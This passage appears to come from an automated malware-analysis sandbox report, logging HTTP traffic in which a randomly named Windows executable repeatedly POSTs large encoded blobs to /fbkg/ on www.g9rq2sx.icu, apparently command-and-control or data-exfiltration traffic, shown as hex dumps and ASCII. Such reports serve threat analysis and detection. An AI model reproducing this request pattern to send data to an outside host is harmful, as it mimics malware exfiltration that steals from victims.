                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFrf7V/MmKgmT/sYGvbpYI5/Bgkj9soCkrPGELhZ3t8k1mn76pUz5bLfMqxJHXlHimuRkE6Cdn5S8pH3spPV+nrmVUn1ZuCTssw9cHspgCkHT08w8gy0PBxvrPT43pd6yB7Egy/KW4ahb0MVu3cR807ySs2GLjpx2dYK6GS7o0vuGbssfFqi96ZQiVCymNkdAc6C+llf43FHBikmh09vGGhXnHEEPL4Lhyd1aDlu34zFVHU+HDsFJcZ2ynEKGvdP/mxHPqr66VOFHbGKyhHx4BiiGysz12U3xOkir3mFvQl8r/V6SDgsG3wQ+Edw18rgYCsJaJ6A/crfvvhub9bceHuPrEl2DNiwSyG7PGEKhwuCrJP/5KoTvL6cMtjBK3tFrjqfjyDL4IIbGp4tO5Mscdc74VXp35lacupBARIR6WD2/jEKQ0VqCSZoX9/7280WpMSNpiJjRiqsbr9C9Be9BDC9D26904o=
                                                                                                                                                                                                Nov 17, 2023 19:27:14.320822001 CET494OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 72 66 37 56 2f 4d 6d 4b 67 6d 54 2f 73 59 47 76 62 70 59 49 35 2f 42 67 6b 6a 39 73 6f 43 6b 72 50 47 45 4c 68 5a 33 74 38 6b 31 6d 6e 37 36 70 55 7a 35 62 4c 66 4d 71 78 4a 48 58 6c 48 69 6d 75 52 6b 45 36 43 64 6e 35 53 38 70 48 33 73 70 50 56 2b 6e 72 6d 56 55 6e 31 5a 75 43 54 73 73 77 39 63 48 73 70 67 43 6b 48 54 30 38 77 38 67 79 30 50 42 78 76 72 50 54 34 33 70 64 36 79 42 37 45 67 79 2f 4b 57 34 61 68 62 30 4d 56 75 33 63 52 38 30 37 79 53 73 32 47 4c 6a 70 78 32 64 59 4b 36 47 53 37 6f 30 76 75 47 62 73 73 66 46 71 69 39 36 5a 51 69 56 43 79 6d 4e 6b 64 41 63 36 43 2b 6c 6c 66 34 33 46 48 42 69 6b 6d 68 30 39 76 47 47 68 58 6e 48 45 45 50 4c 34 4c 68 79 64 31 61 44 6c 75 33 34 7a 46 56 48 55 2b 48 44 73 46 4a 63 5a 32 79 6e 45 4b 47 76 64 50 2f 6d 78 48 50 71 72 36 36 56 4f 46 48 62 47 4b 79 68 48 78 34 42 69 69 47 79 73 7a 31 32 55 33 78 4f 6b 69 72 33 6d 46 76 51 6c 38 72 2f 56 36 53 44 67 73 47 33 77 51 2b 45 64 77 31 38 72 67 59 43 73 4a 61 4a 36 41 2f 63 72 66 76 76 68 75 62 39 62 63 65 48 75 50 72 45 6c 32 44 4e 69 77 53 79 47 37 50 47 45 4b 68 77 75 43 72 4a 50 2f 35 4b 6f 54 76 4c 36 63 4d 74 6a 42 4b 33 74 46 72 6a 71 66 6a 79 44 4c 34 49 49 62 47 70 34 74 4f 35 4d 73 63 64 63 37 34 56 58 70 33 35 6c 61 63 75 70 42 41 52 49 52 36 57 44 32 2f 6a 45 4b 51 30 56 71 43 53 5a 6f 58 39 2f 37 32 38 30 57 70 4d 53 4e 70 69 4a 6a 52 69 71 73 62 72 39 43 39 42 65 39 42 44 43 39 44 32 36 39 30 34 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFrf7V/MmKgmT/sYGvbpYI5/Bgkj9soCkrPGELhZ3t8k1mn76pUz5bLfMqxJHXlHimuRkE6Cdn5S8pH3spPV+nrmVUn1ZuCTssw9cHspgCkHT08w8gy0PBxvrPT43pd6yB7Egy/KW4ahb0MVu3cR807ySs2GLjpx2dYK6GS7o0vuGbssfFqi96ZQiVCymNkdAc6C+llf43FHBikmh09vGGhXnHEEPL4Lhyd1aDlu34zFVHU+HDsFJcZ2ynEKGvdP/mxHPqr66VOFHbGKyhHx4BiiGysz12U3xOkir3mFvQl8r/V6SDgsG3wQ+Edw18rgYCsJaJ6A/crfvvhub9bceHuPrEl2DNiwSyG7PGEKhwuCrJP/5KoTvL6cMtjBK3tFrjqfjyDL4IIbGp4tO5Mscdc74VXp35lacupBARIR6WD2/jEKQ0VqCSZoX9/7280WpMSNpiJjRiqsbr9C9Be9BDC9D26904o=
                                                                                                                                                                                                Nov 17, 2023 19:27:16.954644918 CET495INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:27:18 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 90 cb 0a c2 30 10 45 f7 7e 45 c9 4a c1 24 28 0a 46 5a 41 44 0b 5a 51 b4 d2 a5 94 44 6c fa 48 6b 26 e2 0b ff 5d c1 8a 28 ae 5c b8 18 b8 f7 2e 0e 87 b1 81 6b 59 18 8b 47 a1 86 8d 71 d0 ca 1f e1 0e b2 a4 70 90 d7 5f 0f 66 9e 37 1c f8 c8 02 cd 1d 44 29 88 84 b4 1b 24 0d 69 0c f8 5e 70 a1 73 92 49 45 62 40 3d 9b 3e 60 bd 8a 5d 06 af 4f a4 92 a6 7a 91 a2 8b 26 6c 36 71 8d db 76 8b 71 a0 dd e1 12 d5 79 f2 65 bd d6 5e 9c 27 e8 2f 7a ad f9 71 2a 9a f1 2e 5d 4c 59 b0 48 4a bd cf f5 77 bd c8 98 02 ba 94 66 42 6d 0e 24 07 c0 5c e1 28 57 db e4 7e 24 4c e5 69 af 38 10 9e 67 d4 9c 19 63 ef 3f bd 01 81 7d 56 5b a9 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: d80E~EJ$(FZADZQDlHk&](\.kYGqp_f7D)$i^psIEb@=>`]Oz&l6qvqye^'/zq*.]LYHJwfBm$\(W~$Li8gc?}V[0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                17192.168.11.205014438.163.97.880C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:27:17.474773884 CET501OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 6a 66 37 48 6e 4d 6d 70 49 6d 53 2f 73 59 46 76 62 6f 59 49 34 36 42 67 4e 72 39 70 77 4e 6b 6f 37 47 46 5a 5a 5a 33 65 55 6b 2f 47 6e 36 31 4a 55 78 76 72 4c 4c 4d 71 39 64 48 58 78 58 68 58 4b 52 6c 44 2b 43 4b 77 4e 54 6a 4a 47 38 73 70 50 52 31 48 72 51 56 56 54 66 5a 75 2b 54 73 71 34 39 63 78 6f 70 6d 52 38 48 48 55 38 33 76 41 79 37 45 68 78 67 72 4d 76 73 33 70 64 71 79 41 76 45 67 31 72 4b 56 37 79 69 59 55 4d 56 31 33 63 51 34 30 33 4d 53 6f 58 54 4c 6d 56 78 32 61 6b 4b 37 6d 53 37 35 68 44 76 50 62 74 6c 4e 31 72 69 33 61 64 59 69 56 57 2b 6d 4e 41 64 56 38 75 43 38 57 4e 66 36 56 68 48 64 53 6b 6b 72 55 39 38 4d 6d 68 4c 6e 48 56 6c 50 4c 59 45 68 79 4a 31 61 69 46 75 69 70 7a 43 43 58 56 33 61 7a 74 48 4e 63 56 79 79 6e 56 54 47 76 64 66 2f 6a 4a 48 50 62 62 36 72 6b 4f 43 48 4c 47 4e 35 42 48 6b 78 68 2b 6f 47 79 67 37 31 32 63 6e 78 4e 49 69 72 58 6d 46 2f 6a 4e 7a 6a 50 56 39 4e 54 67 79 49 58 77 39 2b 45 5a 47 31 39 66 65 59 32 6b 4a 49 4e 6d 41 34 4d 72 63 74 50 67 6c 41 74 62 65 4a 33 75 50 72 45 35 4d 44 4e 2b 77 54 43 75 37 4f 31 4d 4b 78 58 79 43 74 4a 50 78 35 4b 70 49 76 4c 33 38 4d 74 36 4c 4b 33 78 76 72 6c 61 66 6a 6e 72 4c 35 4e 38 55 57 70 34 73 64 70 4d 33 44 74 51 57 34 52 32 6b 33 39 46 6b 62 5a 52 42 42 53 67 52 2b 57 44 33 74 7a 45 4e 5a 55 55 6a 47 53 55 33 58 2b 61 4f 32 38 51 47 70 4c 4f 4e 72 54 77 49 46 47 6d 76 59 4e 74 56 31 6b 53 4a 46 67 6a 78 62 31 71 74 6f 73 51 45 45 5a 43 72 77 6e 36 78 54 56 61 4f 41 4e 58 45 6e 4f 6b 51 42 4a 7a 55 72 61 4d 71 6b 70 44 73 70 55 4c 63 41 46 5a 7a 69 64 58 2b 44 54 62 7a 71 58 5a 66 63 59 6d 55 5a 68 6f 2b 72 4f 74 64 48 6f 73 33 74 46 6b 30 63 58 4d 7a 57 73 69 71 51 2b 6b 30 6e 73 6a 56 7a 75 62 72 5a 44 71 38 34 4b 48 4c 69 6f 4e 32 51 70 66 72 79 54 61 55 56 4f 5a 48 2f 43 4d 57 33 73 37 51 56 65 49 56 38 53 38 4c 5a 72 67 36 52 79 69 38 50 30 74 50 62 73 44 6e 6e 47 45 6c 59 30 71 6d 65 62 7a 53 7a 69 42 38 6d 46 37 68 35 31 73 4f 4f 7a 7a 46 5a 32 68 52 6f 44 57 67 49 32 54 6e 50 58 53 4b 74 64 2b 66 72 58 34 75 51 48 45 69 58 65 33 73 69 72 38 6f 68 59 45 77 6d 6a 41 63 65 6e 2b 66 6f 37 33 71 61 7a 53 52 64 36 74 4b 31 51 70 6e 2f 31 39 4a 61 67 78 74 53 73 67 68 79 4b 2b 72 41 6f 4f 2f 58 71 61 57 74 70 30 2b 74 54 61 2f 76 72 38 78 4e 47 70 71 33 43 2b 6e 38 67 69 42 53 71 4d 47 71 72 58 33 42 38 75 50 73 36 75 76 37 4f 64 59 72 58 59 2b 4c 63 31 65 33 33 75 36 55 63 49 4a 6a 4d 2f 7a 70 43 39 30 74 65 6a 38 6f 41 43 5a 6b 56 6a 67 5a 41 79 4a 69 49 62 46 5a 6c 58 4c 58 4f 30 66 53 77 48 50 36 38 4a 58 43 43 56 44 52 66 62 67 62 75 6b 6a 57 67 41 65 39 62 4c 61 4b 54 59 43 63 53 43 45 70 79 37 79 30 52 2f 30 32 54 37 34 61 63 42 79 71 39 6d 79 78 76 33 59 4d 74 4c 48 37 65 44 72 35 4a 45 51 4c 50 31 39 36 63 31 55 4f 50 52 57 58 70 71 38 66 4d 57 61 58 38 4f 6a 33 51 33 6a 4c 73 5a 39 77 2f 66 6b 55 69 35 69 37 74 41 79 43 79 31 74 6d 53 51 6c 56 6d 67 33 35 70 77 55 5a 4d 33 6f 32 6f 31 6e 77 39 67 36 57 66 4c 7a 49 77 37 45 47 56 39 66 45 4d 67 52 65 51 61 30 36 78 55 30 4f 54 37 48 54 6c 33 6c 4d 78 68 53 41 53 64 78 77 39 58 72 55 6e 74 52 73 48 34 64 57 73 46 7a 57 33 69 76 4c 47 30 71 6a 38 67 79 71 48 73 41 30 48 6e 70 6e 4c 77 66 5a 34 65 76 38 4f 65 74 43 63 4e 47 6d 33 6a 45 37 36 59 55 46 50 43 6d 4b 66 2b 34 34 51 78 41 52 6e 6b 68 6a 59 41 46 48 39 6b 2f 31 63 61 39 43 61 79 67 55 4e 79 64 71 38 45 54 6b 37 47 55 79 57 47 4b 71 51 6b 61 68 4a 66 43 35 50 4b 4e 42 52 74 32 69 49 7a 52 4b 6b 76 5a 41 78 68 4c 6f 50 52 47 76 47 61 4b 74 6b 37 45 6c 6b 43 73 36 71 7a 4b 30 45 53 71 41 75 6a 5a 41 68 75 57 47 6d 64 42 6d 75 79 59 52 42 62 70 6d 79 38 5a 65 65 71 2b 65 58 56 72 59 37 66 32 62 2f 41 50 77 77 62 68 6a 72 59 71 75 34 33 4b 6f 67 70 49 55 44 35 42 65 61 4b 74 37 52 42 44 2b 66 58 75 62 4e 76 46 46 42 33 6b 65 39 53 72 59 38 37 48 46 75 69 75 42 78 46 6e 56 47 4a 36 44 57 37 6d 32 67 4b 76 58 50 54 4b 46 65 44 65 43 65 6d 63 4e 6c 54 38 74 56 66 30 58 53 72 6e 2f 70 57
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:27:18.866688967 CET502OUTData Raw: 53 49 4c 47 47 57 51 48 78 68 4e 59 51 4b 38 59 70 4d 73 6c 42 6f 4b 71 50 52 55 46 57 2f 74 76 33 4e 54 68 74 79 76 4e 57 6a 4c 7a 32 51 77 43 33 65 72 6e 4e 33 6e 6a 7a 4e 6f 56 2b 44 4a 6b 38 50 42 54 59 39 34 72 43 59 32 45 76 4b 34 4b 75 41
                                                                                                                                                                                                Data Ascii: SILGGWQHxhNYQK8YpMslBoKqPRUFW/tv3NThtyvNWjLz2QwC3ernN3njzNoV+DJk8PBTY94rCY2EvK4KuAga7p4jNIctYHI6Q4hVjmp8TNuaSQcpGffgy+Oa+hRz8fJBO7l+KPiTi/lMSjKV3fAJUzmhfGm1Zx+R5k3VGEAPo+qJtHGxm7/eMzVzPDtANiNpBIsnJ0SE+9FE/olE0YuihlhI1zY6T3rcpyw1Ewjq/P0IQ/peDwM
                                                                                                                                                                                                Nov 17, 2023 19:27:20.959978104 CET503OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 6a 66 37 48 6e 4d 6d 70 49 6d 53 2f 73 59 46 76 62 6f 59 49 34 36 42 67 4e 72 39 70 77 4e 6b 6f 37 47 46 5a 5a 5a 33 65 55 6b 2f 47 6e 36 31 4a 55 78 76 72 4c 4c 4d 71 39 64 48 58 78 58 68 58 4b 52 6c 44 2b 43 4b 77 4e 54 6a 4a 47 38 73 70 50 52 31 48 72 51 56 56 54 66 5a 75 2b 54 73 71 34 39 63 78 6f 70 6d 52 38 48 48 55 38 33 76 41 79 37 45 68 78 67 72 4d 76 73 33 70 64 71 79 41 76 45 67 31 72 4b 56 37 79 69 59 55 4d 56 31 33 63 51 34 30 33 4d 53 6f 58 54 4c 6d 56 78 32 61 6b 4b 37 6d 53 37 35 68 44 76 50 62 74 6c 4e 31 72 69 33 61 64 59 69 56 57 2b 6d 4e 41 64 56 38 75 43 38 57 4e 66 36 56 68 48 64 53 6b 6b 72 55 39 38 4d 6d 68 4c 6e 48 56 6c 50 4c 59 45 68 79 4a 31 61 69 46 75 69 70 7a 43 43 58 56 33 61 7a 74 48 4e 63 56 79 79 6e 56 54 47 76 64 66 2f 6a 4a 48 50 62 62 36 72 6b 4f 43 48 4c 47 4e 35 42 48 6b 78 68 2b 6f 47 79 67 37 31 32 63 6e 78 4e 49 69 72 58 6d 46 2f 6a 4e 7a 6a 50 56 39 4e 54 67 79 49 58 77 39 2b 45 5a 47 31 39 66 65 59 32 6b 4a 49 4e 6d 41 34 4d 72 63 74 50 67 6c 41 74 62 65 4a 33 75 50 72 45 35 4d 44 4e 2b 77 54 43 75 37 4f 31 4d 4b 78 58 79 43 74 4a 50 78 35 4b 70 49 76 4c 33 38 4d 74 36 4c 4b 33 78 76 72 6c 61 66 6a 6e 72 4c 35 4e 38 55 57 70 34 73 64 70 4d 33 44 74 51 57 34 52 32 6b 33 39 46 6b 62 5a 52 42 42 53 67 52 2b 57 44 33 74 7a 45 4e 5a 55 55 6a 47 53 55 33 58 2b 61 4f 32 38 51 47 70 4c 4f 4e 72 54 77 49 46 47 6d 76 59 4e 74 56 31 6b 53 4a 46 67 6a 78 62 31 71 74 6f 73 51 45 45 5a 43 72 77 6e 36 78 54 56 61 4f 41 4e 58 45 6e 4f 6b 51 42 4a 7a 55 72 61 4d 71 6b 70 44 73 70 55 4c 63 41 46 5a 7a 69 64 58 2b 44 54 62 7a 71 58 5a 66 63 59 6d 55 5a 68 6f 2b 72 4f 74 64 48 6f 73 33 74 46 6b 30 63 58 4d 7a 57 73 69 71 51 2b 6b 30 6e 73 6a 56 7a 75 62 72 5a 44 71 38 34 4b 48 4c 69 6f 4e 32 51 70 66 72 79 54 61 55 56 4f 5a 48 2f 43 4d 57 33 73 37 51 56 65 49 56 38 53 38 4c 5a 72 67 36 52 79 69 38 50 30 74 50 62 73 44 6e 6e 47 45 6c 59 30 71 6d 65 62 7a 53 7a 69 42 38 6d 46 37 68 35 31 73 4f 4f 7a 7a 46 5a 32 68 52 6f 44 57 67 49 32 54 6e 50 58 53 4b 74 64 2b 66 72 58 34 75 51 48 45 69 58 65 33 73 69 72 38 6f 68 59 45 77 6d 6a 41 63 65 6e 2b 66 6f 37 33 71 61 7a 53 52 64 36 74 4b 31 51 70 6e 2f 31 39 4a 61 67 78 74 53 73 67 68 79 4b 2b 72 41 6f 4f 2f 58 71 61 57 74 70 30 2b 74 54 61 2f 76 72 38 78 4e 47 70 71 33 43 2b 6e 38 67 69 42 53 71 4d 47 71 72 58 33 42 38 75 50 73 36 75 76 37 4f 64 59 72 58 59 2b 4c 63 31 65 33 33 75 36 55 63 49 4a 6a 4d 2f 7a 70 43 39 30 74 65
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFjf7HnMmpImS/sYFvboYI46BgNr9pwNko7GFZZZ3eUk/Gn61JUxvrLLMq9dHXxXhXKRlD+CKwNTjJG8spPR1HrQVVTfZu+Tsq49cxopmR8HHU83vAy7EhxgrMvs3pdqyAvEg1rKV7yiYUMV13cQ403MSoXTLmVx2akK7mS75hDvPbtlN1ri3adYiVW+mNAdV8uC8WNf6VhHdSkkrU98MmhLnHVlPLYEhyJ1aiFuipzCCXV3aztHNcVyynVTGvdf/jJHPbb6rkOCHLGN5BHkxh+oGyg712cnxNIirXmF/jNzjPV9NTgyIXw9+EZG19feY2kJINmA4MrctPglAtbeJ3uPrE5MDN+wTCu7O1MKxXyCtJPx5KpIvL38Mt6LK3xvrlafjnrL5N8UWp4sdpM3DtQW4R2k39FkbZRBBSgR+WD3tzENZUUjGSU3X+aO28QGpLONrTwIFGmvYNtV1kSJFgjxb1qtosQEEZCrwn6xTVaOANXEnOkQBJzUraMqkpDspULcAFZzidX+DTbzqXZfcYmUZho+rOtdHos3tFk0cXMzWsiqQ+k0nsjVzubrZDq84KHLioN2QpfryTaUVOZH/CMW3s7QVeIV8S8LZrg6Ryi8P0tPbsDnnGElY0qmebzSziB8mF7h51sOOzzFZ2hRoDWgI2TnPXSKtd+frX4uQHEiXe3sir8ohYEwmjAcen+fo73qazSRd6tK1Qpn/19JagxtSsghyK+rAoO/XqaWtp0+tTa/vr8xNGpq3C+n8giBSqMGqrX3B8uPs6uv7OdYrXY+Lc1e33u6UcIJjM/zpC90te
